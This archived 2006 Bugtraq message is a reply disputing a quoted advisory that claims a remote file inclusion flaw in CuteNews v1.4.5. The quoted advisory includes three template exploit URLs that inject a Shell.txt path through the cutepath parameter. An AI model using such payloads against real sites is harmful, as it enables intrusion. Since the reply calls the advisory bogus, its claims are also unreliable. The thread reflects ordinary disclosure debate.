lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <456C1666.3060300@libero.it>
Date: Tue, 28 Nov 2006 11:58:46 +0100
From: raven <locrideweb@...ero.it>
To: philip anselmo <spoonman500@...mail.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability

The question is:
Why who "find" a vuln, not check that is a really vuln ?
Send faked vuln advisory is stupid and useless...for me... Bugtraq is a 
security mailinglist and there who post need to guarantee that is a real 
mistake. I cant believe that everytime that anyone send something, 
another person, write: "Is a bogus" "Not is a real vulnerability" or 
something like this...
Posters, check what you find, before send here.
Regards,
Francesco Vollero


philip anselmo ha scritto:
> Title : CuteNews v1.4.5 (search.php) Remote file include
> ########################################################################
> #######
>
> Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
>
> ------------------------------------------------------------------------
> Sorce Code:
> **********
> http://cutephp.com/
>
> Affected software description :
> ******************************
> vendor site: http://cutephp.com/
> Application : CuteNews v1.4.5
> Catégorie :Remote File Include
> ------------------------------------------------------------------------
> Vulnerable Code:
> ***************
> require_once("$cutepath/inc/functions.inc.php");
> require_once("$cutepath/data/config.php");
>
> affected file: search.php & show_news.php & show_archives.php
> ----------------------------------------------------------------------
> Exploit:
> *******
> http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt?
> http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt?
> http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt?
>
> ------------------------------------------------------------------------
> ----
>
> greetz: 
> Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all 
> my friends
>
> Special Greeting:AsbMay's Group & TrYaG TeaM
>
> channel:www.asb-may.net & www.tryag.com
>
> contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg@...mail.com
>
> _________________________________________________________________
> MSN Messenger : discutez en direct avec vos amis ! 
> http://www.msn.fr/msger/default.asp
>
> .
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ